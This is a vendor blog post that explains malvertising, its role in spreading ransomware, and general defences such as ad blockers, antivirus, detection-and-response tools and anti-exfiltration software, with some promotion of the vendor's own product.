By |Published On: February 10th, 2023|15 min read|Categories: Ransomware|

Malvertising: What is it and How Can it Lead to a Ransomware Attack?

While there are a wide range of cyberthreats facing every business today, one of the most dangerous is malvertising. This technique seeks to use people’s everyday web browsing activities against them by injecting malware into seemingly innocent online ads. One click on an infected ad can expose businesses to a range of problems, such as data theft.

Malvertising is hard to spot and can be even harder to block, and the consequences of this type of attack can be severe. Therefore, understanding what malvertising is, how it works and how it can be stopped must play an important role in any malware protection strategy. So what do you need to know?

What is a Malvertising Attack?

Malvertising refers to a way of getting malicious software onto a computer or network, and it can be one of the most dangerous and effective attack vectors for cybercriminal groups. 

Unlike tactics such as phishing, which often rely on careless behavior from end users, malvertising can spread silently even when individuals are following cybersecurity best practice guidelines. As such, it’s easy for it to go unnoticed until it’s too late.

Once inside a network, cybercriminals can use this malicious code to hunt down and exfiltrate valuable data. Therefore, it’s something cybersecurity professionals need to be especially mindful of if they are to implement a successful information security strategy.

What is the Meaning of Malvertisements?

Malvertising is a combination of malware and advertising and, as the name implies, it refers to malicious software that spreads via online advertising – most often those ads that are displayed when using web browsers.

Typically, malvertising works by hackers infiltrating ad networks to plant their malware within third-party ads. These are then displayed to users as normal harmless ads – until they click. Whether intentional or not, once the ad is clicked, malicious code is downloaded. 

One of the factors that makes malvertising so dangerous is that it can appear almost anywhere. The vast majority of publishers use third-party ad networks on their websites, providing easy targeting and great reach for cybercriminal gangs. This means that almost any website that carries advertising can potentially be infected with ad malware, including those trusted sites that many people visit as part of their everyday browsing.

What are Examples of Malvertising Attacks?

While the simplest and most common type of malvertising injects malicious code into a user’s machine when they click on ad malware, this is just one form of attack. There are also a range of other methods of executing malware attacks through online advertising that do not require a user to directly interact with an infected ad.

There are a range of ways in which malvertising delivers threats. For example, a user may see a banner ad promoting a special offer, which when clicked, takes them to a legitimate-looking site that says the product on sale is actually out of stock. By the time the visitor leaves the site, they will have already been infected. Other techniques include hiding malware within banner ad pixels or in videos. 

However, users do not even have to click to fall victim. One form of attack is a ‘drive by download’. This exploits vulnerabilities within the browser itself to infect a system when the ad is viewed, even if a user does not directly interact with it. 

These techniques have been used in malvertising attacks that have appeared on some of the world’s highest-profile and most-visited websites, including the New York Times, the BBC, Forbes and the NFL. All of these brands have been used as carriers for malvertising in recent years as a result of their partnerships with legitimate third-party advertisers that have become targets for malware groups.

Does Malvertising Affect Mobile Devices?

While many malvertising attacks use vulnerabilities within desktop versions of popular web browsers, mobile malvertising is increasingly popular as many people’s browsing habits have changed. This can be particularly dangerous for a number of reasons. 

Firstly, with smaller touchscreens, it’s often easier for users to click on ads by accident. What’s more, ad blockers are less common on mobile devices, so more users are likely to see the infected ads, increasing the chance of infection. 

Finally, antivirus protections are also less frequently used on mobiles – especially on personal devices that may also be used to connect to business networks. For example, notes that, while 77 percent of adults in the US use antivirus software, only 24 percent of these users have antivirus solutions installed on their smartphones.

How can Attackers Publish Malvertisements on Legitimate Websites?

 Almost two-thirds of internet users have clicked on a Google ad

One of the most dangerous aspects of a malvertising campaign is how it uses everyday publishers to deliver its packages. Many people may believe that as long as they stay away from risky, obscure or untrusted web content they can avoid falling victim to malware. But with malvertising, this is not the case.

A common attack vector for these threats is to target third-party advertisers, such as  Google Ads, AdPlugg or Propeller Ads. According to research from Hubspot, for example, 63 percent of people have clicked on a Google ad. 

If hackers are able to exploit vulnerabilities in these services, or even buy space on an ad network directly, they can easily reach huge audiences – and they only need a tiny percentage of these viewers to engage with the ad to be successful.

While publishers take great efforts to filter out malicious ads and reduce their own vulnerabilities, there are no guarantees. And these are not the only methods used. Some cybercriminals target sites that rent space directly to advertisers – which may often be smaller publishers with weaker protections – for the use of banner ads or popups.

How does Malvertising Relate to Ransomware?

While malvertising techniques can be used to deliver any type of malicious software, one of the most common threats is ransomware. Figures from Malwarebytes, for example, estimate that this type of malware attack is used in 70 percent of malvertising campaigns. 

The cost of falling victim to ransomware is significant, with the average incident setting a firm back millions of dollars in direct expenses and long-term remediation, so tackling this form of malicious code needs to be a key part of any firm’s data protection strategy.

How Can Malvertising Harm Me?

Malvertising can lead to a wide range of negative consequences. Some attacks may seek to install spyware or adware to track an individual’s activity, for example. However, the most dangerous types of malvertising attacks are those that seek to gain control of a user’s system or steal valuable data – with ransomware a key threat.

Some types of ransomware may block access to critical files or systems, for example. This can greatly harm productivity or even, in some circumstances, prevent a business from operating altogether until access has been restored, either by turning to backups or paying a ransom.

However, increasingly, it is data exfiltration attempts where the real harm of ransomware lies. This can result in major damage to a brand, both in financial and reputational terms, so any ransomware variant that uses this technique must be stopped before it can remove data from the network.

How Does Malvertising Ransomware Bypass Defenses?

Many of these ransomware threats are designed specifically to bypass the common defenses firms have in place.

The majority of antivirus software uses signature matching to detect malicious code, a technique that compares files to lists of known malware to look for key commonality. But increasingly, techniques such as fileless malware are being used to avoid these detection methods.

For example, one increasingly common tactic is to target vulnerabilities in systems such as PowerShell. BlackFog’s research suggests 87 percent of ransomware attacks in 2022 used this method, with ransomware groups favoring it due to its ability to evade detection by traditional defenses.

What are the Consequences of a Ransomware Malvertising Infection?

BlackFog research also indicates that almost nine out of ten ransomware attacks (89 percent) exfiltrate data. This can then be used for a number of purposes, from being sold for profit on the dark web to extorting organizations directly – i.e., demanding a payment in order not to release the data.

Ransomware is big business, and very costly for firms. In 2022, for example, we found the average ransomware payout reached over $258,000. But this only covers the direct cost,  before taking into account the cost of recovering systems, investigating incidents and compensating users. It also does not consider the reputational damage a firm can experience if it loses its customers’ personal data. All put together, the average ransomware attack now costs firms $4.54 million, according to IBM.

In the worst-case scenario, a ransomware attack could result in the organization being forced to shut down completely – as was the case in 2022 when the 157-year-old Lincoln College in Illinois closed for good following a ransomware attack.

How do I Protect Against Malvertising?

Given the damage that malicious advertising can do, its essential firms have a plan to prevent this type of malware infection. However, relying on tried-and-tested security methods alone may not be enough to tackle the most sophisticated threats.

How can I Avoid Malvertising Infections?

One of the most common ways to prevent malvertising is to use an ad blocker. Usually, if the malicious code is prevented from making it to the user’s device, the threat is neutralized. However, there are limitations to this approach. 

For starters, free ad blockers usually operate as third-party extensions to desktop web browsers, which means they add weight to a system and increase loading times. In addition, there are privacy, security and even legality concerns over some free ad blockers, as evidenced by Google, which is restricting some services in upcoming versions of Chrome.

Finally, some malvertising campaigns are tailored to bypass ad blockers. The RoughTed malware discovered in 2017, for example, was able to circumvent some of the most widely-used ad blockers’ filters, so it isn’t safe to assume that just because you’re blocking online ads, you’re safe from malvertising.

Can Antivirus Tools Protect Me From Malware?

The other common first line of defense against a malicious advertisement is the use of antivirus software. But again, this has limitations. As noted above, increased use of fileless malware by cybercriminals has blunted the effectiveness of these solutions, while attacks that take advantage of zero-day vulnerabilities can often evade detection.

As such, you can’t rely solely on these security software solutions to prevent malware from entering your business, as sooner or later, it’s highly likely that an attack will be able to break through these perimeter defenses. However, this does not mean it’s too late to do anything – with the right tools you can still block the most harmful activities, such as data exfiltration, and protect your business from the most dangerous threats.

How can I Know if I’m Infected With Ransomware?

While prevention is always better than cure, this isn’t always possible. Especially when it comes to malvertising, the techniques used by cybercriminals often make it easy for an online ad to infect your network with malicious code, even if you are protected by antivirus software and have employees that are not behaving carelessly.

In such cases, it’s essential you are able to detect threats such as ransomware as quickly as possible so you can take the right steps to remove it before it has a chance to do damage. This means using advanced detection and response (XDR) technology and embracing tools such as artificial intelligence (AI) and ADX to spot suspicious activities within your network.

According to IBM, firms with XDR solutions in place reduce their time to detection by 29 days, while the full use of AI and automation can cut the total cost of a breach by as much as $3.05 million. Such tools can automatically monitor systems, looking for unusual activity such as large, out of hours data transfers, or repeated requests for users to access unauthorized systems.

The downside of many endpoint protection tools, however, is that not all responses are automated and human intervention is still required to manage threats. Newer technologies such as ADX, on the other hand, offer fully automated 24/7 protection. 

What can I do to Protect my Data From a Ransomware Attack?

Data protection needs to be at the heart of any good ransomware strategy – but this is about much more than simply having comprehensive backups available to restore from in the event files are locked or destroyed. The biggest threats come when data is stolen from the network, so efforts to prevent this are essential.

To prevent data exfiltration, you need dedicated endpoint security solutions that can be deployed across every device in order to monitor outgoing traffic and block any unusual activity automatically.

Effective anti data exfiltration (ADX) solutions should be lightweight enough to be deployed across every endpoint on your network, including smartphones and other mobile devices. This ensures they can monitor all traffic and stop it at the point of exfiltration, before it ends up in the hands of ransomware groups.

To be at their most effective, these tools should be used as part of a holistic, defense-in-depth approach that can protect firms against all forms of malware, including threats delivered via a malicious ad. By doing this, firms can rest assured that even if their first lines of protection are bypassed, efforts to steal data can still be identified and prevented before they can do damage.

Share This Story, Choose Your Platform!

Related Posts

  • Crowdstrike Incident

The CrowdStrike Incident: A Global IT Meltdown

July 23rd, 2024|

Discover how the recent CrowdStrike incident caused a global IT meltdown, affecting thousands of businesses. Learn about the event timeline, its impact, and how BlackFog's advanced practices can help prevent such risks. Stay informed and protect your business from future cybersecurity threats.